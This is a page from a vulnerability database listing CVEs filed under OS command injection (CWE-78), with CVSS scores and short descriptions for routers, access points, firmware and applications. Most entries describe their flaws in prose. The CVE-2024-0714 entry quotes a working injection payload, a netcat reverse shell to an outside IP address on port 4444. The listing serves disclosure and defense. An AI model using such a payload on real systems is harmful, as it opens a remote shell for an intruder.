Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

CVEs (5,964)

CVE VENDORS PRODUCTS UPDATED PUBLISHED CVSS
CVE-2023-38319 1Opennds 1Opennds Jun 20, 2025 Jan 26, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.
CVE-2023-38318 1Opennds 1Opennds Jun 20, 2025 Jan 26, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS command...Show more An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.Show less
CVE-2023-38317 1Opennds 1Opennds Jun 3, 2025 Jan 26, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary...Show more An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.Show less
CVE-2024-22372 1Elecom 5Wrc X1800gs B Firmware Wrc X1800gsa B FirmwareWrc X1800gsh B Firmware+2 more Feb 17, 2025 Jan 24, 2024 N/A· v4 6.8 MEDIUM· v3 N/A· v2 OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product...Show more OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product.Show less
CVE-2024-22366 1Yamaha 5Wlx202 Firmware Wlx212 FirmwareWlx222 Firmware+2 more Jun 20, 2025 Jan 24, 2024 N/A· v4 6.8 MEDIUM· v3 N/A· v2 Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific...Show more Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier.Show less
CVE-2023-31037 1Nvidia 1Bluefield Bmc Nov 21, 2024 Jan 24, 2024 N/A· v4 7.2 HIGH· v3 N/A· v2 NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the...Show more NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS. Show less
CVE-2023-6926 1Crestron 1Am 300 Firmware Nov 21, 2024 Jan 23, 2024 N/A· v4 7.8 HIGH· v3 N/A· v2 There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access.
CVE-2024-0778 1Uniview 1Isc 2500 S Firmware Nov 21, 2024 Jan 22, 2024 N/A· v4 9.8 CRITICAL· v3 7.7 HIGH· v2 UNSUPPORTED WHEN ASSIGNED A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage...Show more UNSUPPORTED WHEN ASSIGNED A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.Show less
CVE-2023-49329 1Anomali 1Match Jun 20, 2025 Jan 19, 2024 N/A· v4 7.2 HIGH· v3 N/A· v2 Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate...Show more Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.Show less
CVE-2024-0714 1Sourcefabric 1Phoniebox Nov 21, 2024 Jan 19, 2024 N/A· v4 9.8 CRITICAL· v3 6.5 MEDIUM· v2 A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. T...Show more A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.Show less
CVE-2023-51217 1Tenhot 1Tws 200 Firmware Jun 2, 2025 Jan 18, 2024 N/A· v4 8.8 HIGH· v3 N/A· v2 An issue discovered in TenghuTOS TWS-200 firmware version:V4.0-201809201424 allows a remote attacker to execute arbitrary code via crafted command on the ping page component.
CVE-2024-20277 1Cisco 1Thousandeyes Enterprise Agent Nov 21, 2024 Jan 17, 2024 N/A· v4 8.0 HIGH· v3 N/A· v2 A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate...Show more A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.Show less
CVE-2023-51698 1Mate Desktop 1Atril Apr 10, 2025 Jan 12, 2024 N/A· v4 8.8 HIGH· v3 N/A· v2 Atril is a simple multi-page document viewer. Atril is vulnerable to a critical Command Injection Vulnerability. This vulnerability gives the attacker immediate access to the target system when the target user opens a cr...Show more Atril is a simple multi-page document viewer. Atril is vulnerable to a critical Command Injection Vulnerability. This vulnerability gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL using a maliciously crafted CBT document which is a TAR archive. A patch is available at commit ce41df6.Show less
CVE-2023-49254 1Hongdian 1H8951 4g Esp Firmware Jun 20, 2025 Jan 12, 2024 N/A· v4 8.8 HIGH· v3 N/A· v2 Authenticated user can execute arbitrary commands in the context of the root user by providing payload in the "destination" field of the network test tools. This is similar to the vulnerability CVE-2021-28151 mitigated o...Show more Authenticated user can execute arbitrary commands in the context of the root user by providing payload in the "destination" field of the network test tools. This is similar to the vulnerability CVE-2021-28151 mitigated on the user interface level by blacklisting characters with JavaScript, however, it can still be exploited by sending POST requests directly.Show less
CVE-2023-52026 1Totolink 1Ex1800t Firmware Jun 11, 2025 Jan 12, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOlink EX1800T V9.1.0cu.2112_B20220316 was discovered to contain a remote command execution (RCE) vulnerability via the telnet_enabled parameter of the setTelnetCfg interface
CVE-2024-23061 1Totolink 1A3300r Firmware Jun 20, 2025 Jan 11, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the minute parameter in the setScheduleCfg function.
CVE-2024-23060 1Totolink 1A3300r Firmware Jun 17, 2025 Jan 11, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the ip parameter in the setDmzCfg function.
CVE-2024-23059 1Totolink 1A3300r Firmware Jun 3, 2025 Jan 11, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the username parameter in the setDdnsCfg function.
CVE-2024-23058 1Totolink 1A3300r Firmware Nov 21, 2024 Jan 11, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pass parameter in the setTr069Cfg function.
CVE-2024-23057 1Totolink 1A3300r Firmware Nov 21, 2024 Jan 11, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the tz parameter in the setNtpCfg function.

Previous 1...129130131...299 Next